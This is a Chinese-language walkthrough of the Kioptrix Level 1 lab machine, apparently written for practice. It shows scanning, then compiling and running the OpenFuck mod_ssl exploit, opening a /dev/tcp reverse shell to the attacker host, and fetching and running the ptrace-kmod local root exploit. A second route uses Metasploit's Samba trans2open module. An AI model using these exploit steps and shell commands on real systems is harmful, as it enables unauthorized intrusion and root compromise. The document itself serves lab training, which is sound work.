目录
信息收集:
1.存活扫描
nmap -sn -r 192.168.229.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:02 EST
Nmap scan report for 192.168.229.63 //发现靶机
Host is up (0.00058s latency).
MAC Address: 00:0C:29:74:D4:C2 (VMware)
Nmap scan report for 192.168.229.85
Host is up (0.47s latency).
MAC Address: 92:5E:53:E7:CD:5E (Unknown)
Nmap scan report for 192.168.229.247
Host is up (0.00058s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.229.234
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.34 seconds
2.端口扫描
nmap -sT -p- 192.168.229.63
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:11 EST
Nmap scan report for 192.168.229.63
Host is up (0.0020s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:74:D4:C2 (VMware)
3.服务扫描
nmap -sT -sV --version-all -O 192.168.229.63 -p 22,80,111,139,443,1024
nmap -sT -sV --version-all -O 192.168.229.63 -p 22,80,111,139,443,1024
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:29 EST
Nmap scan report for 192.168.229.63
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:74:D4:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
漏洞利用:
4.查询漏洞
searchsploit mod_ssl
searchsploit mod_ssl
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow | unix/remote/40347.txt
5.漏洞利用
远程缓存区溢出
searchsploit -m 47080.c
└─# searchsploit -m 47080.c
Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
URL: https://www.exploit-db.com/exploits/47080
Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
Codes: CVE-2002-0082, OSVDB-857
Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/47080.c
6.编译脚本并执行:
1.先查看如何利用脚本:
└─# cat 47080.c
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
2.编译后如何执行攻击:
gcc -o a 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.
-------------------------------------------
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sudo apt-get install libssl-dev
gcc -o a 47080.c -lcrypto
-------------------------------------------
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ls
1.txt 47080.c a OneForAll subDomainsBrute
./a
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
: Usage: ./a target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
./a 0x6b 192.168.229.63 443 -c 40
//获得权限
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--21:40:03-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$ whoami
whoami
apache
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -a
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
bash-2.05$
7.提权:
kali获取提权脚本,开启服务,我们利用靶机wget下载并执行
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2023-12-06 20:42:06-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:3921 (3.8K) [text/x-csrc]
正在保存至: “ptrace-kmod.c”
ptrace-kmod.c 100%[=================>] 3.83K --.-KB/s 用时 0.001s
2023-12-06 20:42:14 (2.90 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
靶机下载之前我们弹一个shell,现在用的shell是比较难受的
kali:nc -lvvp 4444
靶机:/bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1
sh-2.05$ wget http://192.168.229.234:8080/ptrace-kmod.c
wget http://192.168.229.234:8080/ptrace-kmod.c
--21:53:08-- http://192.168.229.234:8080/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.229.234:8080... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
21:53:08 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
sh-2.05$ ls
ls
ptrace-kmod.c
sh-2.05$ gcc -o a ptrace-kmod.c
gcc -o a ptrace-kmod.c
sh-2.05$ ./a
[+] Attached to 1075
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
做法二:
信息收集部分:
在nmap做信息收集 发现139端口的samba服务 我们使用msf来检测一下
nmap -sT -sV --version-all -O 192.168.229.63 -p 22,80,111,139,443,1024
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:29 EST
Nmap scan report for 192.168.229.63
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:74:D4:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
1.利用msf的漏扫模块来探测版本信息
search smb
106 auxiliary/scanner/smb/pipe_dcerpc_auditor normal No SMB Session Pipe DCERPC Auditor
107 auxiliary/scanner/smb/smb_enumshares normal No SMB Share Enumeration
108 auxiliary/fuzzers/smb/smb_tree_connect_corrupt normal No SMB Tree Connect Request Corruption
109 auxiliary/fuzzers/smb/smb_tree_connect normal No SMB Tree Connect Request Fuzzer
110 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
111 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
112 auxiliary/dos/smb/smb_loris 2017-06-29 normal No SMBLoris NBSS Denial of Service
113 exploit/windows/local/cve_2020_0796_smbghost 2020-03-13 good Yes SMBv3 Compression Buffer Overflow
114 exploit/windows/smb/cve_2020_0796_smbghost 2020-03-13 average Yes SMBv3 Compression Buffer Overflow
2.使用111的payload
use 111
发现版本为Samba 2.2.1a
msf6 > use 111
msf6 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set rhost 192.168.229.63
rhost => 192.168.229.63
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.229.63:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.229.63:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.229.63: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
3.查找对应的漏洞
search samba 2.2
msf6 auxiliary(scanner/smb/smb_version) > search samba 2.2
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
2 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
3 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
4 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open
4.漏洞利用,msf一把梭
msf6 auxiliary(scanner/smb/smb_version) > use 2
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell
set payload linux/x86/shell/bind_ipv6_tcp set payload linux/x86/shell/reverse_ipv6_tcp set payload linux/x86/shell_bind_tcp
set payload linux/x86/shell/bind_ipv6_tcp_uuid set payload linux/x86/shell/reverse_nonx_tcp set payload linux/x86/shell_bind_tcp_random_port
set payload linux/x86/shell/bind_nonx_tcp set payload linux/x86/shell/reverse_tcp set payload linux/x86/shell_reverse_tcp
set payload linux/x86/shell/bind_tcp set payload linux/x86/shell/reverse_tcp_uuid set payload linux/x86/shell_reverse_tcp_ipv6
set payload linux/x86/shell/bind_tcp_uuid set payload linux/x86/shell_bind_ipv6_tcp
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
View the full module info with the info, or info -d command.
msf6 exploit(linux/samba/trans2open) > set rhost 192.168.229.63
rhost => 192.168.229.63
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.229.63 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.229.63 no The target address
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
View the full module info with the info, or info -d command.
msf6 exploit(linux/samba/trans2open) > run
[*] Started bind TCP handler against 192.168.229.63:4444
[*] 192.168.229.63:139 - Trying return address 0xbffffdfc...
[*] 192.168.229.63:139 - Trying return address 0xbffffcfc...
[*] 192.168.229.63:139 - Trying return address 0xbffffbfc...
[*] 192.168.229.63:139 - Trying return address 0xbffffafc...
[*] 192.168.229.63:139 - Trying return address 0xbffff9fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff8fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff7fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff6fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff5fc...
[*] Command shell session 1 opened (192.168.229.234:41379 -> 192.168.229.63:4444) at 2023-12-06 02:22:52 -0500
whoami
root
id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown